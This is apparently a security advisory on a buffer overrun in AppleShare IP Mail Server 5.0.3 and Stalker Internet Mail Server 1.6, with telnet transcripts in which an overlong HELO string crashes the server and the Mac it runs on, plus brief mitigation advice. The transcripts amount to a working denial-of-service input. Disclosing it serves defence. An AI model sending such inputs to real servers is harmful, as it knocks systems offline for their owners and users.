Vulnerability

    AppleShare IP Mail Server and Stalker Internet Mail Server

Affected

    Mac

Description

    Chris Wedgwood found  following.  There  appears to be  what looks
    like a buffer overrun problem with AppleShare IP Mail Server.   If
    you connect  to the  SMTP port  and issue  a long  string (say 500
    bytes  or  so)  the  server  crashes  -  and because its a Mac, it
    usually crashes the  whole machine to  the point where  it needs a
    reboot.

    This  was  only  tested  against  servers  which  emit  the banner
    'AppleShare IP Mail Server 5.0.3'.  For example:

        $ telnet some.where
        Trying 1.2.3.4...
        Connected to some.where.
        Escape character is '^]'.
        220 some.where AppleShare IP Mail Server 5.0.3 SMTP Server Ready
        HELO XXXXXXXXXXX[....several hundered of these....]XXXXXXXX
        [ and it just hangs ]

        $ ping some.where
        [ ...nothing... ]

    Physically checking the machine shows it has `locked up' and it a
    reboot. According to David Luyer, same is with Stalker Internet
    Mail Server:

        220-Stalker Internet Mail Server V.1.6 is ready.
        220 ESMTP is spoken here.
        HELO xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
        xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
        xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
        [dead]

Solution

    You should filter 548/tcp at your router (port 548 is used by  the
    ASIP  file  sharing  stuff;  it's  analagous  to ports 137-139 for
    windows systems).  Next releases should cover this bugs.